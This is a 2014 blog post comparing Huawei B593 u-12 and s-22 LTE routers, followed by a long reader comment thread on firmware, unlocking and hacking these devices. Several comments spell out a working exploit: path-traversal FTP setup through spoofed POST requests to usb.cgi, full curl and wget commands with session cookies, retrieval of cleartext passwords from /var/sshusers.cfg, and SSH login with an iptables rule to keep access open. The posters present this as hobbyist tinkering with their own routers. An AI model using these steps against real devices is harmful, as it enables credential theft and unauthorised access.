Huawei B593 different models revisited: u-12 vs s-22

Friday, May 16. 2014

This is something that has been bugging me since November. In my post about different models, I stated that I have a u-12 (and still do). Last year I did setup a s-22 to a friend and got to see that it is pretty much the same. However, "pretty much the same" is not exactly the same.

The s-22 is a newer model and it has been well established, that it has a TDD 2600 MHz added into it. All the FDD frequencies are exactly the same than in u-12.

In the comments of my post, a user suggested that s-22 differs from u-12 by having only one USB-connector. At the time I was unable to find proof of that, all the pictures I could found of alleged s-22 units had no difference for a u-12 unit.

Now the situation has changed. In my ventures of the wonderful Internet I found an article What's the difference between HUAWEI B593s-22 and B593u-12? and it has a picture of both units side by side in it. Nice! But which one is which?

Just to make sure that s-22 is in the left and u-12 is in the right, I'll post a fresh picture of my own u-12 unit:

Also to close the case I also found a vendor page with a nice picture of s-22 in it, see HUAWEI B593s-22 4G LTE CPE [B593s-22]. It has a picture of the unit in the page, and their s-22 looks exactly the same than the left unit in the picture, and exactly NOT the same than my u-12. Apparently s-22 does not have a power switch, it lacks the side USB-connector and SIM-card -slot has been changed into a tray. Lot of differences to spot, actually.

So I'm confident that s-22 is very much re-designed both in hardware and firmware. The hardware side is surely changed because of the new(ish) 4G TDD radio interface. And while Huawei engineers were at it, they changed also the firmware in number of ways, one of them being to resist hacking attempts better than their 1st gen version did. This is also a well established fact, s-22 firmware has a completely different structure than u-12 firmware.

Now me and everybody else should be able to identify the units by a simple visual inspection.

by Jari Turkia in Huawei B593 at 09:16 | Comments (55) | Share in LinkedIn

Comments
Display comments as (Linear | Threaded)

Jevgenij on :

Hi! I see you have lack of information over here.

Luckily, I have both B593s-22 and B593u-12 and will share some photos and info about both models.

First, they both have almost the same case (Blue inner - u-12, Grey inner - s-22).
Here are pictures of both from all 4 sides
https://dl.dropboxusercontent.com/u/27946583/B593/SAM_1487.jpg
https://dl.dropboxusercontent.com/u/27946583/B593/SAM_1488.jpg
https://dl.dropboxusercontent.com/u/27946583/B593/SAM_1489.jpg
https://dl.dropboxusercontent.com/u/27946583/B593/SAM_1490.jpg

s-22 have no side usb, but power button and sim tray are the same (clicking sim fixator)

Also the back sticker has clear information about modem model. S/N number starts with S2.... and default WLAN SSID has different format and there is "Model" label on it.

The main difference is s-22 has HiSilicon chipset while u-12 QUALCOMM one.

HiSilicon chipset can be configured through HiStudio software. You can control a lot of modem software parameters (as frequency band and lots more).

s-22 has SSH enabled by default, but it has unique admin password, which generated based on device S/N. I guess only Huawei can do it.
Comments (8)

Jari Turkia on :

Thank you very much for your input. Since I don't have a s-22 I cannot do such a comparison myself.

Perhaps I should steal/borrow/lend one just to see what can be done with it hacking-wise. If there would be a single leak which would allow users to view the contents of /var/-directory (and sshusers.cfg), it would be really wonderful.
Comments (21)

Jevgenij on :

I looked for bin directory and I think that B539 uses opensource bftpd as ftp server.

Quick googling tells there are several exploits in bftpd which allows listing system files.

Maybe that's will be a hint
Comments (8)

Jari Turkia on :

Can I ask where did you get the bftpd information from?

The binary is there, but it is not being run. My u-12 has this on process list:
32020 0 912 S /bin/web -s 21 -t 0 -s 22 -t 2
32102 0 216 S telnetd
32130 0 364 S /bin/sshd -s 4 -t 0 -F

That would gear me towards something Huawei wrote themselves.
Comments (21)

Jevgenij on :

I am in s-22 shell.

I see bftpd in top processes.

I have noticed that process only appears if you actually connected via browser to the router ftp server.

You can also check /var/bftpd.status file to see if it gets updated.

And in /var/ftp/ftpdpassword there are login pass and ROOT dir! You can actually access whole filesystem through ftp.
Comments (8)

Jari Turkia on :

Thanks for that. I opened FTP-connection and guess what, I have bftpd in the process-list:
6157 0 376 S /bin/bftpd -s 19 -t 0 -l 15 -c /var/ftp/bftpd.conf -D
6158 0 376 S /bin/bftpd -s 19 -t 0 -l 15 -c /var/ftp/bftpd.conf -D

Looks like Huawei is using inetd-type front-end for their daemons and spawn new processes on request.
Comments (21)

Jevgenij on :

Seems that ftp will keep giving us a lot of fun!

Then you connect to ftp not only bftpd gets started, but also SSH port gets opened!!! Sick!

Today I got SSH access to u-12 SSH in two minutes without your B593cmd.pl exploit:)

Steps were like
1) Set up ftp with user folder ../..
2) Fetch /var/sshusers.cfg and read admin password
3) Keep ftp connection active (cd folder or get some file) (I don't know what timeout is, but is enough to shh and update timetables)
4) SSH with simple command ssh admin@192.168.1.1
5) Type shell
6) Copy paste and enter
iptables -I INPUT -i br0 -j ACCEPT
7) Now you don't need your ftp to be active.


Everything is done using this teliasonera firmware
http://www.telia.se/privat/support/mobiltbredband/uppdaterausbmodemorouter#huaweib593formac

About FW. It is nice firmware with a lot of languages of Nordic and Baltic countries (English too). Has SMS support. Wide network mode settings (even 2G only mode) and FTP ../.. folder vulnerability! It has unique SHH admin password. Don't know if it differs from device to device or always stays the same.
Comments (8)

Jim on :

Hi Guys. I'm certainly no hacker and feel a bit lost reading most of this. But i'm looking for help as i'm stuck.
Recently purchased a Huawei B593u-12
It was advertised as unlocked.
I am using a free mobile sim in france. I recently tried this and can get it to work in a Netgear aircard hotspot. However it has to roam to an Orange network as Free and Orange share this feature and the signal is too weak to access the free data internet connection.
So i have the Huawei running but i can't get it to connect. It's showing Orange and the signal strength but i get the red light on the box next to the signal meter.
I suspect the problem is that roaming is not permitted. On the gui there appears to be no option to allow roaming.
Also if i chose the setup wizard and complete the process it says to please wait while the router reboots but the router does not appear to reboot and the message stays on the screen indef.
Anyway i suspect the problem is the lack of being able to roam, on the internet settings page there is a note saying that roaming is not possible.
Anyone know if there is a workaround without complicated hacking. I've been searching for a solution for hours but this is the closest i came to finding people who knew what they were talking about. (i think) :-D
Comments (2)

Jari Turkia on :

Ok, not much of a hacking needed there.

Your u-12 is SIM-locked to the telco who purchased the box from Huawei. As established years ago, Huawei's business model is, that they sell hardware ONLY to telcos. Apparently telcos are contract bound to do minimal firmware modification with accompanying mod-kit. One option there seems to be to restrict roaming.

To liberate your box, go: http://lmgtfy.com/?q=Huawei+Code+Calculator
That should give you enough pointers what to attempt next.
Comments (21)

jivy on :

Hi,

can someone help me to setup usb printer in b593s-22

i try to insert usb printer and cannot detect also with usb storage.

i already enabled samba and ftp, add user
Comment (1)

Jari Turkia on :

That is something I've never attempted. If you manage to get that one working, please let us know.
Comments (21)

Olli on :

Hi

For your information.
On B593s-22 device with Elisa's V200R001B180D20SP05C260 firmware. SSH is enabled by default.

There isn't excutecmd.cgi command. Only ping.cgi so you can't use B593cmd.pl script.

From web management you can't set FTP location to ../.. (because you need browse it) but you can do it directly using cgi.
Just send POST command:
acc=1&pathchange=1&type=1&folder=InternetGatewayDevice.Services.StorageService.1.LogicalVolume.3.Folder.4&path=%2F..%2F..&0=test&1=Qwerty1234&2=1&6=1&4=%2F..%2F..&5=-L3VzYjFfMS90ZXN0&7=0

to http://elisa.home/html/application/usb.cgi?RequestFile=/html/application/usbuser.asp

Then use can download /var/sshusers.cfg file from ftp and it contains plain text passwords.
Comment (1)

Jari Turkia on :

Thanks for the info. I can lend a s-22, so I'm thinking about updating the exploit tool. The idea would be to automate opening SSH-port and fetching the passwords from /var/sshusers.cfg. We'll need to see when I have the time to work on that.
Comments (21)

Jevgenij on :

Hi

How do I correctly send POST request?
I just get some error page in return to my POST with curl.

I could also give you access to remote machine with connected b593s-22 modem if you would like to try to hack it.
Comments (8)

Jari Turkia on :

Did you try something like this: http://curl.haxx.se/docs/httpscripting.html#POST

You have two options: --data or --form.
I've used --form to POST data succesfully.
Comments (21)

Jevgenij on :

Thanks.

I got it. I have slightly different POST request in my TeliaSonera B593s22 and because of this I had error of "unknown parameter" after trying the request from Ollis' post.

I have scanned my own POST request and had this data

POST url: http://homerouter.cpe/html/application/usb.cgi?RequestFile=/html/application/usbuser.asp

POST data:
acc 1
type 1
folder InternetGatewayDevice.Services.StorageService.1.LogicalVolume.16.Folder.9
path /usb1_0/LOST.DIR
0 test
1 123123123
2 1
6 1
4 /usb1_0/LOST.DIR
5 -L3VzYjFfMC9MT1NULkRJUg==
7 0

I have edited this POST request and sent it again. Worked like a magic!

Also I found that shell got "vi" program which is nice tool to view text files directly in the shell. Would be nice to have nano editor inside too...
Comments (8)

Jari Turkia on :

Completely off-topic: nano is for n00bs! :-)
Real hackers use ed and vi if ed is not available.
Comments (21)

Jevgenij on :

Thank you. The idea to spoof POST request is really fantastic! I had a feeling that this stupid javascript folder check is the only protection and there is no server side checking and you gave me inspiration to try!
Comments (8)

Jarkko R. on :

How the hell do you fetch the file? I think i managed to change the folder, but I cant see anything else on FTP than the folders that were there also earlier, so no /var or anything anywhere.
Comments (2)

Jari Turkia on :

Did you already check this out?
http://blog.hqcodeshop.fi/archives/202-Extracting-varcurcfg.xml-from-NVRAM-Solved!.html

It has all the details you need.
Comments (21)

Jarkko R. on :

Well then I must have incompatible firmware since it isn't working, although it is same as Olli has. And yes, it is the s-22 model.
Comments (2)

Jari Turkia on :

I have a friend who is running a s-22. He already agreed to borrow me that for testing. It looks like our favorite u-12 is not sold anymore.
Comments (21)

Jevgenij on :

Just plugin USB driver and enable Ftp function in the router web settings, then do the post spoof

Then you just connect to ftp 192.168.1.1 and download the file.
Comments (8)

joergen vestergaard on :

Dear anyone,
Does anybodu have a secure firmware for router LTE B593s-22?

Please send me :-), while I cant find it.

best regars
Joergen
Comment (1)

Jari Turkia on :

The only one I know is from German Telekom. See: http://blog.hqcodeshop.fi/archives/215-Huawei-B593-u-12-firmware-spreadsheet.html#c1053

There is a link to the file of: Firmware_Speedport_LTE_II_B593s-12_V200R001B180D35SP01C748.zip

However, I don't have a s-22 and cannot try that one out. If you do, please tell us how it ended up.
Comments (21)

sylpheed on :

My B593s-22 always seems to get into "Equipment Mode" on every boot up. Many core features (WLAN, DHCP, etc) are not working. Firmware upgrade doesn't work. Any idea how to switch back to "Normal Mode"?
Log file: https://db.tt/s7ymxgwS
Comments (2)

ilkka on :

Did anyone ever figure out how to get out of 'equipment mode', I was satisfied with my setup and just restarted the router (B593s-22) and it booted into this 'equipment mode' where ~nothing works.
Comment (1)

Jari Turkia on :

What I understand about the infamous "equipment mode" is that the device is not running normal firmware, but an emergency one.

Suggested remedy is to use the B593 upgrade tool, but it is not generally available in any of the reliable sources. With the tool you'll be able to upgrade the firmware from LAN.
Comments (21)

sylpheed on :

I did try to flash different variants of B593s-22 firmware with B593S tool successfully, but the router still refused to get out from "Equipment Mode". I tried to SSH into the router with exploit by Ilkka on different firmware version but didn't work either... unless someone is kind enough to tell me where I can get V200R001B180D20SP05C260.
Comments (2)

MikkoM on :

I have an unlocked Tele2 version of the B593s-22 router and some time ago it automatically updated a new firmware V200R001B236D30SP01C56. This new firmware supports manual LTE band selection/locking LTE800/1800/2600MHz. Does anyone know where to download this package? (V200R001B236D30SP01C(xxx))
Comment (1)

Pasta on :

Did you find any firmware to B593s-22?
I have a router with Orange software: V200R001B180D25SP00C314
with poor functonality.

BTW - does anybody have a Mac computer and is able to connect to Samba server on this router. There is no problem from Windows, but I have 2 Macs (Macbook Retina Pro and iMac mini) and I can't connect: smb://192.168.1.1/usb1_1
Comment (1)

andor on :

Hi,

I recently brought LTE B593s-22, and try to setup FTP server. It works well from LAN, but from outside it's not visible. Is there a way to access USB storage via FTP protocol from Internet or not supported?

Thanks for help
Comment (1)

Jari Turkia on :

Well ... I don't think that was the original intention, when they designed B593. If you can access the box via SSH, you can leverage the firewall rules, but they intended the FTP-server to be accessible only from your local network.
Comments (21)

poka on :

very good
Comment (1)

Ilkka on :

Guide to get SSH working on a B593s-22 running Saunalahti/Elisa firmware V200R001B180D20SP05C260 you need to do the following:


1) With a browser running some sort of developer tools that allow you to view request/response data:
2) Login to the router, note the Cookie: -header, something like:

Language=fi; SessionID_R3=SESSIONID

3) Navigate to "Services -> User Settings"
4) Click 'Edit'
5) Select 'User Path' and select any path on the USB device
6) Click 'Submit'
7) Get the HTTP POST data to the POST performed to usb.cgi, this is an example of mine with auth info removed

acc=2&type=1&folder=InternetGatewayDevice.Services.StorageService.1.LogicalVolume.2.Folder.22&path=%2Fusb1_1%2Ffoo&0=USERNAME&1=USER_PASSWORD&2=1&6=0&4=%2Fusb1_1%2Ffoo&5=-L3VzYjFfMS9mb28%3D&7=0

(for some reason 5= contains the same path "/usb1_1/foo" as a BASE64 encoded string, seems like it is not used for anything though.)

the folder part is specific to your setup, what I posted will not work for you. The last number must be increased by 1 for the POST to work!

8-) POST a request with the cookie you got and the data we have (I did not test if the device enforces IP addresses to cookies, so better use the same computer for curl and browser):

curl -v --cookie "Language=fi; SessionID_R3=SESSIONID" --data-urlencode "acc=2" --data-urlencode "type=1" --data-urlencode "folder=InternetGatewayDevice.Services.StorageService.1.LogicalVolume.2.Folder.23" --data-urlencode "path=/../../" --data-urlencode "0=USERNAME" --data-urlencode "1=USER_PASSWORD" --data-urlencode "2=1" --data-urlencode "6=0" --data-urlencode "4=/../../" --data-urlencode "5=-L3VzYjFfMS9mb28=" --data-urlencode "7=0" http://elisa.home/html/application/usb.cgiRequestFile=/html/application/usbuser.asp"

Note: Folder.23 in the request we send; This is what we sniffed with our browser + 1 , if you do not increment this number the request will fail.


9) ftp to your router and get /var/sshusers.cfg

10) congrats, you have the cleartext admin and user passwords, ssh admin@elisa.home :-)
Comment (1)

Jari Turkia on :

I'd like to include your finding in my B593 exploit tool (see: http://blog.hqcodeshop.fi/archives/227-u-12-pre-SP100-exploits-in-a-single-tool.html). Is it ok for me to contact you via e-mail about testing the tool with a s-22?
Comments (21)

Janne on :

Hi,

I just tried this on my S-22 router that I got from dna. In that firmware they have disabled the option of selecting the folder in the web interface, so straightforward copypasting of the post request didn't work. But it worked after after changing parameters 6 and 7 to 0 (just like in your post.)
Comment (1)

Goblet on :

I Figured out how to do even easier without folder ID etc. I just tried this with unbranded s22 that has hostname homerouter.cpe and it worked.

1. Insert an usb stick. Check the device name/path, it might be usb1_1 (I had so)

2. Login and find out the session cookie and make a cookie.txt file for wget.

3. Delete all ftp users.

4. Do a wget request like this. See the path with /usb1_1/../../..
wget -O - --load-cookies cookie.txt --post-data='type=0&4=%2Fusb1_1%2F..%2F..%2F..&0=ftpluser&1=ftpluser&5=-L3VzYjFfMS8%3D&6=1&7=0' "http://homerouter.cpe/html/application/usb.cgi?RequestFile=/html/application/usbuser.asp"

5. Go to web UI and choose edit ftp-user. Don't change anything but just save it again.

6. Ftp to the router, get /var/sshusers.cfg and enjoy :-)
Comment (1)

Jari Turkia on :

See https://blog.hqcodeshop.fi/archives/254-First-B593-s-22-exploit-Setup-FTP-to-get-varsshusers.cfg.html

I published that couple weeks ago. It just gives you instant access, no more trickery needed.
Comments (21)

on :

Hello! I would like to contact with you about the most simple and reliable RFID long-range access control system.
Special offer for ... [rest of the sales pitch chopped]
Comment (1)

Jari Turkia on :

Sir, your're selling me RFID stuff on a blog post regarding Huawei LTE hardware. Way not cool! :-(
Comments (21)

Glauco Soares on :

Hi There ,
I am running the Huawei B593 (sold as unblocked to any network) with a 4g unlimited sim, data and calls and text so no limitations from the network provider.
The issue I am having is data is working fine but when I connect a normal telephone to the router tel port and try to call in order to use my free gsm calls allowance(no voip) the router blue tel light flashes the telephone got a dial tone but the router never stablishes or received sucesssfully any calls. It always gives me a busy dial tone after any number or if i call from another number it says the line is busy. I have contacted the online company who sold me the router and they assure me that this is a firmware limitation rather than a router hardware faulty.The router was sold as unblocked to any network. Any one any experience on this or where to find alternatives firmware to have more freedom to use my call allowances?
Comment (1)

sam on :

Hi guys i need b593u91 web ui only if any one know please send me link on email the reson of web ui recently i unlocked this devi e and compnay make update from there side so now the device is unlocked but no signal need orignal huawei web ui for conection almasadir.tec@gmail.comthank you
Comment (1)

Jari Turkia on :

This is a FAQ. It doesn't work like that. You cannot change the web UI only and expect everything to work.
Comments (21)

moris231 on :

Hello someone maybe have a V200R001B270D05DM00C000 firmware ?
I have V200R001B270D05DM00C260, but I need to back to V200R001B270D10SP00C00.

I edited a V200R001B270D10SP00C00
in HexEditor to be acceptable by this firmware but at half way I got an error and semi-brick of my router... in Hexeditor is :

V200R1B270D05DM00C260

instead

V200R001B270D05DM00C260


I installed before V200R001B270D05DM00C260 because I found on one portugal forum that this firmware have ferquency band network mode but it doesn't.

Program for Update a firmware from computer doesn't work too.
Comment (1)

Riad on :

My B593s-22 is semi bricked and it's in "Equipment Mode". Many core features (WLAN, DHCP, USIM detection, etc) are not working. Firmware upgrade doesn't work. Any idea how to switch back to "Normal Mode"?
Comment (1)

Jari Turkia on :

Ok. This is something I've asked before, but still no answer: How do you know its in "equipment mode"? Does it say so, or are you just guessing?
Comments (21)

Numan on :

Hy Jari, I really appreciate your work on this blog I have almost red all of you posts related to Huawei B593. I have Huawei B593u-12 Vivia Kuwait Network, I unlocked it a year ago I used C54 and C73 but in both connection is not stable. What I understand is that I is always looking for other networks I use 3g only. but even then I will pick up my network and will not connect and some time its connected but no TCP UPD shows 0KB.
I want to try these German Denmark and other firmware's but I am afraid I will get locked again and the sim unlock code I don't have it any more.


It will really helpful if you can tell a good stable firmware 3G/2100 so that I don't get interruption.
Comment (1)

Jari Turkia on :

When talking about u-12 it is very safe to test firmwares (unlike with s-22). If you don't like it, just flash another one. I've been happy with Telia one, but feel free to try some out. I do recommend the Swedish / German / Danish ones you are afraid to test.

All telcos in this corner of the world have obsoleted both u-12 and s-22 and moved towards E5186, which is basically an improved s-22.
Comments (21)

Louann Schram on :

I just found your website after looking for info on Huawei B593 and I'm so glad I found you :-)
Comment (1)

Huawei B315 on :

When will you have a review of the Huawei B315 4G Router sub-models?
Comment (1)

Jari Turkia on :

When I get my hands on one!

There is no magic source of hardware for me. For sure Huawei doesn't want me to tinker with their stuff. Sometimes I see something interesting and investigate them, sometimes people contact me. I haven't bumped into one yet, sorry.
Comments (21)

JMTC on :

Hola tengo un Huawei B593s-22 con ...
-rest-of-gibberish-removed-
Comment (1)

Jari Turkia on :

Try being a reasonable contributor and write in English, please. That way all of us can understand what you're writing.
Comments (21)

Matti Joutkoski on :

How about this Huawei B593-s12 model, that is labeled as T-Mobile? After a some investigation looks like this model dedicated only for T-mobile and some other company, can not find any "standard" FW for it.

https://easy-firmware.com/index.php?a=downloads&b=folder&id=340

Any idea if u-12 or s-12 FWs could be used with it? The FW it comes with is not the best one.

reg. matti
Comment (1)

Add Comment
E-Mail addresses will not be displayed and will only be used for E-Mail notifications.
Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
Standard emoticons like :-) and ;-) are converted to images.

Submitted comments will be subject to moderation before being displayed.

Calendar

Mon Tue Wed Thu Fri Sat Sun
Back December '24
            1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31          

Quicksearch

Archives

Categories

RSS feeds of this Blog

Blog Administration

Open login screen

Powered by

Parts of this serendipity template are by Abdussamad Abdurrazzaq and Jari Turkia. License